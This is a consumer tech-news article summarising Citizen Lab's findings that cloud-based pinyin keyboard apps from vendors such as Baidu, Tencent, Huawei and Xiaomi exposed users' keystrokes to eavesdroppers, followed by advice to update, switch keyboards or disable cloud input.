Researchers have uncovered serious vulnerabilities in cloud-based keyboard apps used for typing Chinese characters with the pinyin writing system.
These flaws could potentially expose a billion users’ keystrokes to malicious actors.
The Citizen Lab, based in Toronto, Canada, recently published a study on apps created by nine manufacturers: Baidu, Honor, Huawei, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi.
Looking into devices sold in China, the researchers found that eight of the nine vendors transmitted users’ keystrokes, in essence potentially exposing over a billion users to eavesdroppers.
The real problem with most of these apps is the cloud-based prediction feature: “Typing Chinese,” these apps claim, they help users do quickly.
By including this feature, keylogging is sent to remote servers, so the interception of your keystrokes is really enabled.
Although the research team reported these security holes to the nine vendors in question, most responded and made the necessary changes, but a few keyboard applications still proved to be vulnerable.
In fact, in August last year, Citizen Lab was first to point out cryptographic vulnerabilities in Tencent’s Sogou Input Method that could enable enemies to decrypt users’ keystrokes without sending any additional network traffic.
So what should users do?
If a user uses QQ Pinyin or has a phone with a pre-installed keyboard, they should change the keyboard right now.
If not, users of Sogou, Baidu, or iFlytek keyboard apps should ensure that their keyboard apps and the operating system for the devices are updated.
As for users of the Baidu IME keyboard, a switch of the keyboard app or disabling the cloud-based input on the device is recommended.
You have to be very careful about your keystrokes, as there may be sensitive data that you do not want others to access.
Be on the alert and protect your privacy.
The primary risk involves the potential exposure of keystrokes to unauthorized parties due to cloud-based prediction features that transmit typed data to remote servers.
The study identified apps from major manufacturers including Baidu, Honor, Huawei, and Xiaomi among others, with Tencent’s Sogou Input Method specifically noted for cryptographic vulnerabilities.
Most manufacturers have addressed the reported vulnerabilities by making necessary security improvements, although some apps still remain at risk.
Users should immediately update their keyboard apps and device operating systems, or consider switching to more secure keyboard applications, especially if using apps like Baidu IME or Sogou.
Besides updating or switching apps, users should disable cloud-based input features and remain vigilant about the security settings of any installed apps that handle sensitive input.
Also Read: Secret Essential Windows Keyboard Shortcut Keys You Didn’t Know Existed on Your Keyboard
Also Read: How Keyboard Sounds Can Reveal Your Passwords: Acoustic Side-Channel Attacks Explained
Highlights "Ask Photos" AI tool announced at Google I/O for Google Photos. Users can search…
Highlights Gemini Nano AI "Help Me Write" feature now in Chrome browser. Available in version…
Highlights GoldPickaxe malware targets both iOS and Android devices as of February 2024. Malware can…
Highlights iPhone SE 4 expected in 2025 with 48MP camera and 6.1-inch OLED display. iPhone…
Highlights Xperia 1 VI features a 1080x2340px OLED display and Snapdragon 8 Gen 3. Xperia…
Highlights Realme GT 6T features an advanced 9-layer cooling system. Device includes the industry's largest…